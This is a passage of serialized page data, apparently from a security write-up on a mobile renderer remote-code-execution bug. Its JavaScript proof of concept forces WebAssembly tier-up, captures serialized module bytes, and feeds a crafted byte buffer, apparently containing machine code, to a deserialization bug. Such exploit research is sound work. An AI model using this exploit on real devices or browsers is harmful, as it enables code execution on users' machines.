0x100000",{"type":27,"tag":207,"props":4702,"children":4703},{"style":238},[4704],{"type":33,"value":4685},{"type":27,"tag":207,"props":4706,"children":4707},{"style":220},[4708],{"type":33,"value":4690},{"type":27,"tag":207,"props":4710,"children":4711},{"style":226},[4712],{"type":33,"value":4713},"++",{"type":27,"tag":207,"props":4715,"children":4716},{"style":238},[4717],{"type":33,"value":1424},{"type":27,"tag":207,"props":4719,"children":4720},{"class":209,"line":270},[4721,4726],{"type":27,"tag":207,"props":4722,"children":4723},{"style":1335},[4724],{"type":33,"value":4725}," func",{"type":27,"tag":207,"props":4727,"children":4728},{"style":238},[4729],{"type":33,"value":4301},{"type":27,"tag":207,"props":4731,"children":4732},{"class":209,"line":296},[4733],{"type":27,"tag":207,"props":4734,"children":4735},{"style":238},[4736],{"type":33,"value":451},{"type":27,"tag":36,"props":4738,"children":4739},{},[4740],{"type":33,"value":4741},"Finally, running this code on the device:",{"type":27,"tag":101,"props":4743,"children":4745},{"code":4744,"language":1570,"meta":7,"className":1571,"style":7},"(async () => {\n var wasm_code = new Uint8Array([\n 0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n 0, 0, 10, 4, 1, 2, 0, 11,\n ]);\n var mod = new WebAssembly.Module(wasm_code);\n var inst = new WebAssembly.Instance(mod);\n var func = inst.exports.shell;\n\n // %WasmTierUpFunction(func);\n for (let i = 0; i \u003C 0x100000; i++) {\n func();\n }\n\n let r = bug(mod);\n result = (await r.next()).value;\n console.log(result);\n\n let result_bytes = new Uint8Array(result);\n console.log('[' + result_bytes.join(', ') + ']');\n})();\n",[4746],{"type":27,"tag":84,"props":4747,"children":4748},{"__ignoreMap":7},[4749,4772,4800,5019,5086,5093,5136,5179,5218,5225,5233,5293,5305,5313,5320,5351,5394,5421,5428,5464,5528],{"type":27,"tag":207,"props":4750,"children":4751},{"class":209,"line":210},[4752,4756,4760,4764,4768],{"type":27,"tag":207,"props":4753,"children":4754},{"style":238},[4755],{"type":33,"value":1343},{"type":27,"tag":207,"props":4757,"children":4758},{"style":214},[4759],{"type":33,"value":2311},{"type":27,"tag":207,"props":4761,"children":4762},{"style":238},[4763],{"type":33,"value":2316},{"type":27,"tag":207,"props":4765,"children":4766},{"style":214},[4767],{"type":33,"value":2321},{"type":27,"tag":207,"props":4769,"children":4770},{"style":238},[4771],{"type":33,"value":384},{"type":27,"tag":207,"props":4773,"children":4774},{"class":209,"line":244},[4775,4780,4784,4788,4792,4796],{"type":27,"tag":207,"props":4776,"children":4777},{"style":214},[4778],{"type":33,"value":4779}," var",{"type":27,"tag":207,"props":4781,"children":4782},{"style":220},[4783],{"type":33,"value":1588},{"type":27,"tag":207,"props":4785,"children":4786},{"style":226},[4787],{"type":33,"value":229},{"type":27,"tag":207,"props":4789,"children":4790},{"style":214},[4791],{"type":33,"value":1597},{"type":27,"tag":207,"props":4793,"children":4794},{"style":1335},[4795],{"type":33,"value":1602},{"type":27,"tag":207,"props":4797,"children":4798},{"style":238},[4799],{"type":33,"value":1607},{"type":27,"tag":207,"props":4801,"children":4802},{"class":209,"line":270},[4803,4807,4811,4815,4819,4823,4827,4831,4835,4839,4843,4847,4851,4855,4859,4863,4867,4871,4875,4879,4883,4887,4891,4895,4899,4903,4907,4911,4915,4919,4923,4927,4931,4935,4939,4943,4947,4951,4955,4959,4963,4967,4971,4975,4979,4983,4987,4991,4995,4999,5003,5007,5011,5015],{"type":27,"tag":207,"props":4804,"children":4805},{"style":232},[4806],{"type":33,"value":2361},{"type":27,"tag":207,"props":4808,"children":4809},{"style":238},[4810],{"type":33,"value":1123},{"type":27,"tag":207,"props":4812,"children":4813},{"style":232},[4814],{"type":33,"value":1624},{"type":27,"tag":207,"props":4816,"children":4817},{"style":238},[4818],{"type":33,"value":1123},{"type":27,"tag":207,"props":4820,"children":4821},{"style":232},[4822],{"type":33,"value":1633},{"type":27,"tag":207,"props":4824,"children":4825},{"style":238},[4826],{"type":33,"value":1123},{"type":27,"tag":207,"props":4828,"children":4829},{"style":232},[4830],{"type":33,"value":1642},{"type":27,"tag":207,"props":4832,"children":4833},{"style":238},[4834],{"type":33,"value":1123},{"type":27,"tag":207,"props":4836,"children":4837},{"style":232},[4838],{"type":33,"value":1651},{"type":27,"tag":207,"props":4840,"children":4841},{"style":238},[4842],{"type":33,"value":1123},{"type":27,"tag":207,"props":4844,"children":4845},{"style":232},[4846],{"type":33,"value":1660},{"type":27,"tag":207,"props":4848,"children":4849},{"style":238},[4850],{"type":33,"value":1123},{"type":27,"tag":207,"props":4852,"children":4853},{"style":232},[4854],{"type":33,"value":1660},{"type":27,"tag":207,"props":4856,"children":4857},{"style":238},[4858],{"type":33,"value":1123},{"type":27,"tag":207,"props":4860,"children":4861},{"style":232},[4862],{"type":33,"value":1660},{"type":27,"tag":207,"props":4864,"children":4865},{"style":238},[4866],{"type":33,"value":1123},{"type":27,"tag":207,"props":4868,"children":4869},{"style":232},[4870],{"type":33,"value":1651},{"type":27,"tag":207,"props":4872,"children":4873},{"style":238},[4874],{"type":33,"value":1123},{"type":27,"tag":207,"props":4876,"children":4877},{"style":232},[4878],{"type":33,"value":1693},{"type":27,"tag":207,"props":4880,"children":4881},{"style":238},[4882],{"type":33,"value":1123},{"type":27,"tag":207,"props":4884,"children":4885},{"style":232},[4886],{"type":33,"value":1651},{"type":27,"tag":207,"props":4888,"children":4889},{"style":238},[4890],{"type":33,"value":1123},{"type":27,"tag":207,"props":4892,"children":4893},{"style":232},[4894],{"type":33,"value":1710},{"type":27,"tag":207,"props":4896,"children":4897},{"style":238},[4898],{"type":33,"value":1123},{"type":27,"tag":207,"props":4900,"children":4901},{"style":232},[4902],{"type":33,"value":1660},{"type":27,"tag":207,"props":4904,"children":4905},{"style":238},[4906],{"type":33,"value":1123},{"type":27,"tag":207,"props":4908,"children":4909},{"style":232},[4910],{"type":33,"value":1660},{"type":27,"tag":207,"props":4912,"children":4913},{"style":238},[4914],{"type":33,"value":1123},{"type":27,"tag":207,"props":4916,"children":4917},{"style":232},[4918],{"type":33,"value":1735},{"type":27,"tag":207,"props":4920,"children":4921},{"style":238},[4922],{"type":33,"value":1123},{"type":27,"tag":207,"props":4924,"children":4925},{"style":232},[4926],{"type":33,"value":1744},{"type":27,"tag":207,"props":4928,"children":4929},{"style":238},[4930],{"type":33,"value":1123},{"type":27,"tag":207,"props":4932,"children":4933},{"style":232},[4934],{"type":33,"value":1651},{"type":27,"tag":207,"props":4936,"children":4937},{"style":238},[4938],{"type":33,"value":1123},{"type":27,"tag":207,"props":4940,"children":4941},{"style":232},[4942],{"type":33,"value":1660},{"type":27,"tag":207,"props":4944,"children":4945},{"style":238},[4946],{"type":33,"value":1123},{"type":27,"tag":207,"props":4948,"children":4949},{"style":232},[4950],{"type":33,"value":1769},{"type":27,"tag":207,"props":4952,"children":4953},{"style":238},[4954],{"type":33,"value":1123},{"type":27,"tag":207,"props":4956,"children":4957},{"style":232},[4958],{"type":33,"value":1778},{"type":27,"tag":207,"props":4960,"children":4961},{"style":238},[4962],{"type":33,"value":1123},{"type":27,"tag":207,"props":4964,"children":4965},{"style":232},[4966],{"type":33,"value":1651},{"type":27,"tag":207,"props":4968,"children":4969},{"style":238},[4970],{"type":33,"value":1123},{"type":27,"tag":207,"props":4972,"children":4973},{"style":232},[4974],{"type":33,"value":1152},{"type":27,"tag":207,"props":4976,"children":4977},{"style":238},[4978],{"type":33,"value":1123},{"type":27,"tag":207,"props":4980,"children":4981},{"style":232},[4982],{"type":33,"value":1633},{"type":27,"tag":207,"props":4984,"children":4985},{"style":238},[4986],{"type":33,"value":1123},{"type":27,"tag":207,"props":4988,"children":4989},{"style":232},[4990],{"type":33,"value":1811},{"type":27,"tag":207,"props":4992,"children":4993},{"style":238},[4994],{"type":33,"value":1123},{"type":27,"tag":207,"props":4996,"children":4997},{"style":232},[4998],{"type":33,"value":1820},{"type":27,"tag":207,"props":5000,"children":5001},{"style":238},[5002],{"type":33,"value":1123},{"type":27,"tag":207,"props":5004,"children":5005},{"style":232},[5006],{"type":33,"value":1829},{"type":27,"tag":207,"props":5008,"children":5009},{"style":238},[5010],{"type":33,"value":1123},{"type":27,"tag":207,"props":5012,"children":5013},{"style":232},[5014],{"type":33,"value":1829},{"type":27,"tag":207,"props":5016,"children":5017},{"style":238},[5018],{"type":33,"value":1842},{"type":27,"tag":207,"props":5020,"children":5021},{"class":209,"line":296},[5022,5026,5030,5034,5038,5042,5046,5050,5054,5058,5062,5066,5070,5074,5078,5082],{"type":27,"tag":207,"props":5023,"children":5024},{"style":232},[5025],{"type":33,"value":2361},{"type":27,"tag":207,"props":5027,"children":5028},{"style":238},[5029],{"type":33,"value":1123},{"type":27,"tag":207,"props":5031,"children":5032},{"style":232},[5033],{"type":33,"value":1660},{"type":27,"tag":207,"props":5035,"children":5036},{"style":238},[5037],{"type":33,"value":1123},{"type":27,"tag":207,"props":5039,"children":5040},{"style":232},[5041],{"type":33,"value":1866},{"type":27,"tag":207,"props":5043,"children":5044},{"style":238},[5045],{"type":33,"value":1123},{"type":27,"tag":207,"props":5047,"children":5048},{"style":232},[5049],{"type":33,"value":1693},{"type":27,"tag":207,"props":5051,"children":5052},{"style":238},[5053],{"type":33,"value":1123},{"type":27,"tag":207,"props":5055,"children":5056},{"style":232},[5057],{"type":33,"value":1651},{"type":27,"tag":207,"props":5059,"children":5060},{"style":238},[5061],{"type":33,"value":1123},{"type":27,"tag":207,"props":5063,"children":5064},{"style":232},[5065],{"type":33,"value":1744},{"type":27,"tag":207,"props":5067,"children":5068},{"style":238},[5069],{"type":33,"value":1123},{"type":27,"tag":207,"props":5071,"children":5072},{"style":232},[5073],{"type":33,"value":1660},{"type":27,"tag":207,"props":5075,"children":5076},{"style":238},[5077],{"type":33,"value":1123},{"type":27,"tag":207,"props":5079,"children":5080},{"style":232},[5081],{"type":33,"value":1907},{"type":27,"tag":207,"props":5083,"children":5084},{"style":238},[5085],{"type":33,"value":1842},{"type":27,"tag":207,"props":5087,"children":5088},{"class":209,"line":445},[5089],{"type":27,"tag":207,"props":5090,"children":5091},{"style":238},[5092],{"type":33,"value":2648},{"type":27,"tag":207,"props":5094,"children":5095},{"class":209,"line":867},[5096,5100,5104,5108,5112,5116,5120,5124,5128,5132],{"type":27,"tag":207,"props":5097,"children":5098},{"style":214},[5099],{"type":33,"value":4779},{"type":27,"tag":207,"props":5101,"children":5102},{"style":220},[5103],{"type":33,"value":1931},{"type":27,"tag":207,"props":5105,"children":5106},{"style":226},[5107],{"type":33,"value":229},{"type":27,"tag":207,"props":5109,"children":5110},{"style":214},[5111],{"type":33,"value":1597},{"type":27,"tag":207,"props":5113,"children":5114},{"style":220},[5115],{"type":33,"value":1944},{"type":27,"tag":207,"props":5117,"children":5118},{"style":238},[5119],{"type":33,"value":1041},{"type":27,"tag":207,"props":5121,"children":5122},{"style":1335},[5123],{"type":33,"value":1953},{"type":27,"tag":207,"props":5125,"children":5126},{"style":238},[5127],{"type":33,"value":1343},{"type":27,"tag":207,"props":5129,"children":5130},{"style":220},[5131],{"type":33,"value":1962},{"type":27,"tag":207,"props":5133,"children":5134},{"style":238},[5135],{"type":33,"value":1455},{"type":27,"tag":207,"props":5137,"children":5138},{"class":209,"line":892},[5139,5143,5147,5151,5155,5159,5163,5167,5171,5175],{"type":27,"tag":207,"props":5140,"children":5141},{"style":214},[5142],{"type":33,"value":4779},{"type":27,"tag":207,"props":5144,"children":5145},{"style":220},[5146],{"type":33,"value":1978},{"type":27,"tag":207,"props":5148,"children":5149},{"style":226},[5150],{"type":33,"value":229},{"type":27,"tag":207,"props":5152,"children":5153},{"style":214},[5154],{"type":33,"value":1597},{"type":27,"tag":207,"props":5156,"children":5157},{"style":220},[5158],{"type":33,"value":1944},{"type":27,"tag":207,"props":5160,"children":5161},{"style":238},[5162],{"type":33,"value":1041},{"type":27,"tag":207,"props":5164,"children":5165},{"style":1335},[5166],{"type":33,"value":1999},{"type":27,"tag":207,"props":5168,"children":5169},{"style":238},[5170],{"type":33,"value":1343},{"type":27,"tag":207,"props":5172,"children":5173},{"style":220},[5174],{"type":33,"value":2008},{"type":27,"tag":207,"props":5176,"children":5177},{"style":238},[5178],{"type":33,"value":1455},{"type":27,"tag":207,"props":5180,"children":5181},{"class":209,"line":1475},[5182,5186,5190,5194,5198,5202,5206,5210,5214],{"type":27,"tag":207,"props":5183,"children":5184},{"style":214},[5185],{"type":33,"value":4779},{"type":27,"tag":207,"props":5187,"children":5188},{"style":220},[5189],{"type":33,"value":2024},{"type":27,"tag":207,"props":5191,"children":5192},{"style":226},[5193],{"type":33,"value":229},{"type":27,"tag":207,"props":5195,"children":5196},{"style":220},[5197],{"type":33,"value":1978},{"type":27,"tag":207,"props":5199,"children":5200},{"style":238},[5201],{"type":33,"value":1041},{"type":27,"tag":207,"props":5203,"children":5204},{"style":220},[5205],{"type":33,"value":2041},{"type":27,"tag":207,"props":5207,"children":5208},{"style":238},[5209],{"type":33,"value":1041},{"type":27,"tag":207,"props":5211,"children":5212},{"style":220},[5213],{"type":33,"value":2050},{"type":27,"tag":207,"props":5215,"children":5216},{"style":238},[5217],{"type":33,"value":241},{"type":27,"tag":207,"props":5219,"children":5220},{"class":209,"line":2065},[5221],{"type":27,"tag":207,"props":5222,"children":5223},{"emptyLinePlaceholder":19},[5224],{"type":33,"value":2062},{"type":27,"tag":207,"props":5226,"children":5227},{"class":209,"line":2092},[5228],{"type":27,"tag":207,"props":5229,"children":5230},{"style":4647},[5231],{"type":33,"value":5232}," // %WasmTierUpFunction(func);\n",{"type":27,"tag":207,"props":5234,"children":5235},{"class":209,"line":2130},[5236,5241,5245,5249,5253,5257,5261,5265,5269,5273,5277,5281,5285,5289],{"type":27,"tag":207,"props":5237,"children":5238},{"style":376},[5239],{"type":33,"value":5240}," for",{"type":27,"tag":207,"props":5242,"children":5243},{"style":238},[5244],{"type":33,"value":686},{"type":27,"tag":207,"props":5246,"children":5247},{"style":214},[5248],{"type":33,"value":217},{"type":27,"tag":207,"props":5250,"children":5251},{"style":220},[5252],{"type":33,"value":4671},{"type":27,"tag":207,"props":5254,"children":5255},{"style":226},[5256],{"type":33,"value":229},{"type":27,"tag":207,"props":5258,"children":5259},{"style":232},[5260],{"type":33,"value":4680},{"type":27,"tag":207,"props":5262,"children":5263},{"style":238},[5264],{"type":33,"value":4685},{"type":27,"tag":207,"props":5266,"children":5267},{"style":220},[5268],{"type":33,"value":4690},{"type":27,"tag":207,"props":5270,"children":5271},{"style":226},[5272],{"type":33,"value":4695},{"type":27,"tag":207,"props":5274,"children":5275},{"style":232},[5276],{"type":33,"value":4700},{"type":27,"tag":207,"props":5278,"children":5279},{"style":238},[5280],{"type":33,"value":4685},{"type":27,"tag":207,"props":5282,"children":5283},{"style":220},[5284],{"type":33,"value":4690},{"type":27,"tag":207,"props":5286,"children":5287},{"style":226},[5288],{"type":33,"value":4713},{"type":27,"tag":207,"props":5290,"children":5291},{"style":238},[5292],{"type":33,"value":1424},{"type":27,"tag":207,"props":5294,"children":5295},{"class":209,"line":2168},[5296,5301],{"type":27,"tag":207,"props":5297,"children":5298},{"style":1335},[5299],{"type":33,"value":5300}," func",{"type":27,"tag":207,"props":5302,"children":5303},{"style":238},[5304],{"type":33,"value":4301},{"type":27,"tag":207,"props":5306,"children":5307},{"class":209,"line":4095},[5308],{"type":27,"tag":207,"props":5309,"children":5310},{"style":238},[5311],{"type":33,"value":5312}," }\n",{"type":27,"tag":207,"props":5314,"children":5315},{"class":209,"line":4103},[5316],{"type":27,"tag":207,"props":5317,"children":5318},{"emptyLinePlaceholder":19},[5319],{"type":33,"value":2062},{"type":27,"tag":207,"props":5321,"children":5322},{"class":209,"line":4154},[5323,5327,5331,5335,5339,5343,5347],{"type":27,"tag":207,"props":5324,"children":5325},{"style":214},[5326],{"type":33,"value":425},{"type":27,"tag":207,"props":5328,"children":5329},{"style":220},[5330],{"type":33,"value":4113},{"type":27,"tag":207,"props":5332,"children":5333},{"style":226},[5334],{"type":33,"value":229},{"type":27,"tag":207,"props":5336,"children":5337},{"style":1335},[5338],{"type":33,"value":4122},{"type":27,"tag":207,"props":5340,"children":5341},{"style":238},[5342],{"type":33,"value":1343},{"type":27,"tag":207,"props":5344,"children":5345},{"style":220},[5346],{"type":33,"value":2008},{"type":27,"tag":207,"props":5348,"children":5349},{"style":238},[5350],{"type":33,"value":1455},{"type":27,"tag":207,"props":5352,"children":5353},{"class":209,"line":4203},[5354,5358,5362,5366,5370,5374,5378,5382,5386,5390],{"type":27,"tag":207,"props":5355,"children":5356},{"style":220},[5357],{"type":33,"value":4160},{"type":27,"tag":207,"props":5359,"children":5360},{"style":226},[5361],{"type":33,"value":229},{"type":27,"tag":207,"props":5363,"children":5364},{"style":238},[5365],{"type":33,"value":686},{"type":27,"tag":207,"props":5367,"children":5368},{"style":376},[5369],{"type":33,"value":4173},{"type":27,"tag":207,"props":5371,"children":5372},{"style":220},[5373],{"type":33,"value":4113},{"type":27,"tag":207,"props":5375,"children":5376},{"style":238},[5377],{"type":33,"value":1041},{"type":27,"tag":207,"props":5379,"children":5380},{"style":1335},[5381],{"type":33,"value":4186},{"type":27,"tag":207,"props":5383,"children":5384},{"style":238},[5385],{"type":33,"value":4191},{"type":27,"tag":207,"props":5387,"children":5388},{"style":220},[5389],{"type":33,"value":4196},{"type":27,"tag":207,"props":5391,"children":5392},{"style":238},[5393],{"type":33,"value":241},{"type":27,"tag":207,"props":5395,"children":5396},{"class":209,"line":4249},[5397,5401,5405,5409,5413,5417],{"type":27,"tag":207,"props":5398,"children":5399},{"style":220},[5400],{"type":33,"value":1432},{"type":27,"tag":207,"props":5402,"children":5403},{"style":238},[5404],{"type":33,"value":1041},{"type":27,"tag":207,"props":5406,"children":5407},{"style":1335},[5408],{"type":33,"value":1441},{"type":27,"tag":207,"props":5410,"children":5411},{"style":238},[5412],{"type":33,"value":1343},{"type":27,"tag":207,"props":5414,"children":5415},{"style":220},[5416],{"type":33,"value":4242},{"type":27,"tag":207,"props":5418,"children":5419},{"style":238},[5420],{"type":33,"value":1455},{"type":27,"tag":207,"props":5422,"children":5423},{"class":209,"line":4290},[5424],{"type":27,"tag":207,"props":5425,"children":5426},{"emptyLinePlaceholder":19},[5427],{"type":33,"value":2062},{"type":27,"tag":207,"props":5429,"children":5430},{"class":209,"line":4304},[5431,5435,5440,5444,5448,5452,5456,5460],{"type":27,"tag":207,"props":5432,"children":5433},{"style":214},[5434],{"type":33,"value":425},{"type":27,"tag":207,"props":5436,"children":5437},{"style":220},[5438],{"type":33,"value":5439}," result_bytes",{"type":27,"tag":207,"props":5441,"children":5442},{"style":226},[5443],{"type":33,"value":229},{"type":27,"tag":207,"props":5445,"children":5446},{"style":214},[5447],{"type":33,"value":1597},{"type":27,"tag":207,"props":5449,"children":5450},{"style":1335},[5451],{"type":33,"value":1602},{"type":27,"tag":207,"props":5453,"children":5454},{"style":238},[5455],{"type":33,"value":1343},{"type":27,"tag":207,"props":5457,"children":5458},{"style":220},[5459],{"type":33,"value":4242},{"type":27,"tag":207,"props":5461,"children":5462},{"style":238},[5463],{"type":33,"value":1455},{"type":27,"tag":207,"props":5465,"children":5467},{"class":209,"line":5466},20,[5468,5472,5476,5480,5484,5488,5492,5496,5500,5504,5508,5512,5516,5520,5524],{"type":27,"tag":207,"props":5469,"children":5470},{"style":220},[5471],{"type":33,"value":1432},{"type":27,"tag":207,"props":5473,"children":5474},{"style":238},[5475],{"type":33,"value":1041},{"type":27,"tag":207,"props":5477,"children":5478},{"style":1335},[5479],{"type":33,"value":1441},{"type":27,"tag":207,"props":5481,"children":5482},{"style":238},[5483],{"type":33,"value":1343},{"type":27,"tag":207,"props":5485,"children":5486},{"style":1325},[5487],{"type":33,"value":2191},{"type":27,"tag":207,"props":5489,"children":5490},{"style":226},[5491],{"type":33,"value":1374},{"type":27,"tag":207,"props":5493,"children":5494},{"style":220},[5495],{"type":33,"value":5439},{"type":27,"tag":207,"props":5497,"children":5498},{"style":238},[5499],{"type":33,"value":1041},{"type":27,"tag":207,"props":5501,"children":5502},{"style":1335},[5503],{"type":33,"value":2208},{"type":27,"tag":207,"props":5505,"children":5506},{"style":238},[5507],{"type":33,"value":1343},{"type":27,"tag":207,"props":5509,"children":5510},{"style":1325},[5511],{"type":33,"value":2217},{"type":27,"tag":207,"props":5513,"children":5514},{"style":238},[5515],{"type":33,"value":2222},{"type":27,"tag":207,"props":5517,"children":5518},{"style":226},[5519],{"type":33,"value":2227},{"type":27,"tag":207,"props":5521,"children":5522},{"style":1325},[5523],{"type":33,"value":2232},{"type":27,"tag":207,"props":5525,"children":5526},{"style":238},[5527],{"type":33,"value":1455},{"type":27,"tag":207,"props":5529,"children":5531},{"class":209,"line":5530},21,[5532],{"type":27,"tag":207,"props":5533,"children":5534},{"style":238},[5535],{"type":33,"value":4310},{"type":27,"tag":36,"props":5537,"children":5538},{},[5539],{"type":33,"value":5540},"We get the serialized bytes:",{"type":27,"tag":36,"props":5542,"children":5543},{},[5544],{"type":27,"tag":126,"props":5545,"children":5548},{"alt":5546,"src":5547},"image2","/posts/mobile-renderer-rce/image2.png",[],{"type":27,"tag":36,"props":5550,"children":5551},{},[5552,5554,5559],{"type":33,"value":5553},"We can now embed this output into the original bytecode that calls ",{"type":27,"tag":84,"props":5555,"children":5557},{"className":5556},[],[5558],{"type":33,"value":1039},{"type":33,"value":736},{"type":27,"tag":101,"props":5561,"children":5563},{"code":5562,"language":1570,"meta":7,"className":1571,"style":7},"(async () => {\n const wasm_code = new Uint8Array([\n 0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n 0, 0, 10, 4, 1, 2, 0, 11,\n ]);\n const buffer = new Uint8Array([\n 146, 6, 222, 192, 174, 122, 171, 151, 31, 0, 0, 0, 39, 61, 60, 31, 0, 16, 3, 0, 0, 0, 0, 0, 64,\n 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 56, 0, 0, 0, 44, 0, 0, 0, 56, 0, 0, 0, 56, 0,\n 0, 0, 56, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 95, 36, 3, 213, 16, 1, 128, 210, 127, 35, 3,\n 213, 231, 67, 190, 169, 253, 123, 1, 169, 253, 67, 0, 145, 191, 3, 0, 145, 253, 123, 193, 168,\n 255, 35, 3, 213, 192, 3, 95, 214, 31, 32, 3, 213, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 92, 50, 162, 0,\n ]);\n let r = bug(wasm_code, buffer.buffer);\n result = (await r.next()).value;\n console.log('DeserializeWasmModule result: ' + result);\n const wasm_instance = new WebAssembly.Instance(result);\n const f = wasm_instance.exports.shell;\n console.log(f);\n})();\n",[5564],{"type":27,"tag":84,"props":5565,"children":5566},{"__ignoreMap":7},[5567,5590,5617,5836,5903,5910,5937,6148,6400,6651,6876,7058,7280,7358,7365,7412,7455,7491,7534,7573,7601],{"type":27,"tag":207,"props":5568,"children":5569},{"class":209,"line":210},[5570,5574,5578,5582,5586],{"type":27,"tag":207,"props":5571,"children":5572},{"style":238},[5573],{"type":33,"value":1343},{"type":27,"tag":207,"props":5575,"children":5576},{"style":214},[5577],{"type":33,"value":2311},{"type":27,"tag":207,"props":5579,"children":5580},{"style":238},[5581],{"type":33,"value":2316},{"type":27,"tag":207,"props":5583,"children":5584},{"style":214},[5585],{"type":33,"value":2321},{"type":27,"tag":207,"props":5587,"children":5588},{"style":238},[5589],{"type":33,"value":384},{"type":27,"tag":207,"props":5591,"children":5592},{"class":209,"line":244},[5593,5597,5601,5605,5609,5613],{"type":27,"tag":207,"props":5594,"children":5595},{"style":214},[5596],{"type":33,"value":2333},{"type":27,"tag":207,"props":5598,"children":5599},{"style":220},[5600],{"type":33,"value":1588},{"type":27,"tag":207,"props":5602,"children":5603},{"style":226},[5604],{"type":33,"value":229},{"type":27,"tag":207,"props":5606,"children":5607},{"style":214},[5608],{"type":33,"value":1597},{"type":27,"tag":207,"props":5610,"children":5611},{"style":1335},[5612],{"type":33,"value":1602},{"type":27,"tag":207,"props":5614,"children":5615},{"style":238},[5616],{"type":33,"value":1607},{"type":27,"tag":207,"props":5618,"children":5619},{"class":209,"line":270},[5620,5624,5628,5632,5636,5640,5644,5648,5652,5656,5660,5664,5668,5672,5676,5680,5684,5688,5692,5696,5700,5704,5708,5712,5716,5720,5724,5728,5732,5736,5740,5744,5748,5752,5756,5760,5764,5768,5772,5776,5780,5784,5788,5792,5796,5800,5804,5808,5812,5816,5820,5824,5828,5832],{"type":27,"tag":207,"props":5621,"children":5622},{"style":232},[5623],{"type":33,"value":2361},{"type":27,"tag":207,"props":5625,"children":5626},{"style":238},[5627],{"type":33,"value":1123},{"type":27,"tag":207,"props":5629,"children":5630},{"style":232},[5631],{"type":33,"value":1624},{"type":27,"tag":207,"props":5633,"children":5634},{"style":238},[5635],{"type":33,"value":1123},{"type":27,"tag":207,"props":5637,"children":5638},{"style":232},[5639],{"type":33,"value":1633},{"type":27,"tag":207,"props":5641,"children":5642},{"style":238},[5643],{"type":33,"value":1123},{"type":27,"tag":207,"props":5645,"children":5646},{"style":232},[5647],{"type":33,"value":1642},{"type":27,"tag":207,"props":5649,"children":5650},{"style":238},[5651],{"type":33,"value":1123},{"type":27,"tag":207,"props":5653,"children":5654},{"style":232},[5655],{"type":33,"value":1651},{"type":27,"tag":207,"props":5657,"children":5658},{"style":238},[5659],{"type":33,"value":1123},{"type":27,"tag":207,"props":5661,"children":5662},{"style":232},[5663],{"type":33,"value":1660},{"type":27,"tag":207,"props":5665,"children":5666},{"style":238},[5667],{"type":33,"value":1123},{"type":27,"tag":207,"props":5669,"children":5670},{"style":232},[5671],{"type":33,"value":1660},{"type":27,"tag":207,"props":5673,"children":5674},{"style":238},[5675],{"type":33,"value":1123},{"type":27,"tag":207,"props":5677,"children":5678},{"style":232},[5679],{"type":33,"value":1660},{"type":27,"tag":207,"props":5681,"children":5682},{"style":238},[5683],{"type":33,"value":1123},{"type":27,"tag":207,"props":5685,"children":5686},{"style":232},[5687],{"type":33,"value":1651},{"type":27,"tag":207,"props":5689,"children":5690},{"style":238},[5691],{"type":33,"value":1123},{"type":27,"tag":207,"props":5693,"children":5694},{"style":232},[5695],{"type":33,"value":1693},{"type":27,"tag":207,"props":5697,"children":5698},{"style":238},[5699],{"type":33,"value":1123},{"type":27,"tag":207,"props":5701,"children":5702},{"style":232},[5703],{"type":33,"value":1651},{"type":27,"tag":207,"props":5705,"children":5706},{"style":238},[5707],{"type":33,"value":1123},{"type":27,"tag":207,"props":5709,"children":5710},{"style":232},[5711],{"type":33,"value":1710},{"type":27,"tag":207,"props":5713,"children":5714},{"style":238},[5715],{"type":33,"value":1123},{"type":27,"tag":207,"props":5717,"children":5718},{"style":232},[5719],{"type":33,"value":1660},{"type":27,"tag":207,"props":5721,"children":5722},{"style":238},[5723],{"type":33,"value":1123},{"type":27,"tag":207,"props":5725,"children":5726},{"style":232},[5727],{"type":33,"value":1660},{"type":27,"tag":207,"props":5729,"children":5730},{"style":238},[5731],{"type":33,"value":1123},{"type":27,"tag":207,"props":5733,"children":5734},{"style":232},[5735],{"type":33,"value":1735},{"type":27,"tag":207,"props":5737,"children":5738},{"style":238},[5739],{"type":33,"value":1123},{"type":27,"tag":207,"props":5741,"children":5742},{"style":232},[5743],{"type":33,"value":1744},{"type":27,"tag":207,"props":5745,"children":5746},{"style":238},[5747],{"type":33,"value":1123},{"type":27,"tag":207,"props":5749,"children":5750},{"style":232},[5751],{"type":33,"value":1651},{"type":27,"tag":207,"props":5753,"children":5754},{"style":238},[5755],{"type":33,"value":1123},{"type":27,"tag":207,"props":5757,"children":5758},{"style":232},[5759],{"type":33,"value":1660},{"type":27,"tag":207,"props":5761,"children":5762},{"style":238},[5763],{"type":33,"value":1123},{"type":27,"tag":207,"props":5765,"children":5766},{"style":232},[5767],{"type":33,"value":1769},{"type":27,"tag":207,"props":5769,"children":5770},{"style":238},[5771],{"type":33,"value":1123},{"type":27,"tag":207,"props":5773,"children":5774},{"style":232},[5775],{"type":33,"value":1778},{"type":27,"tag":207,"props":5777,"children":5778},{"style":238},[5779],{"type":33,"value":1123},{"type":27,"tag":207,"props":5781,"children":5782},{"style":232},[5783],{"type":33,"value":1651},{"type":27,"tag":207,"props":5785,"children":5786},{"style":238},[5787],{"type":33,"value":1123},{"type":27,"tag":207,"props":5789,"children":5790},{"style":232},[5791],{"type":33,"value":1152},{"type":27,"tag":207,"props":5793,"children":5794},{"style":238},[5795],{"type":33,"value":1123},{"type":27,"tag":207,"props":5797,"children":5798},{"style":232},[5799],{"type":33,"value":1633},{"type":27,"tag":207,"props":5801,"children":5802},{"style":238},[5803],{"type":33,"value":1123},{"type":27,"tag":207,"props":5805,"children":5806},{"style":232},[5807],{"type":33,"value":1811},{"type":27,"tag":207,"props":5809,"children":5810},{"style":238},[5811],{"type":33,"value":1123},{"type":27,"tag":207,"props":5813,"children":5814},{"style":232},[5815],{"type":33,"value":1820},{"type":27,"tag":207,"props":5817,"children":5818},{"style":238},[5819],{"type":33,"value":1123},{"type":27,"tag":207,"props":5821,"children":5822},{"style":232},[5823],{"type":33,"value":1829},{"type":27,"tag":207,"props":5825,"children":5826},{"style":238},[5827],{"type":33,"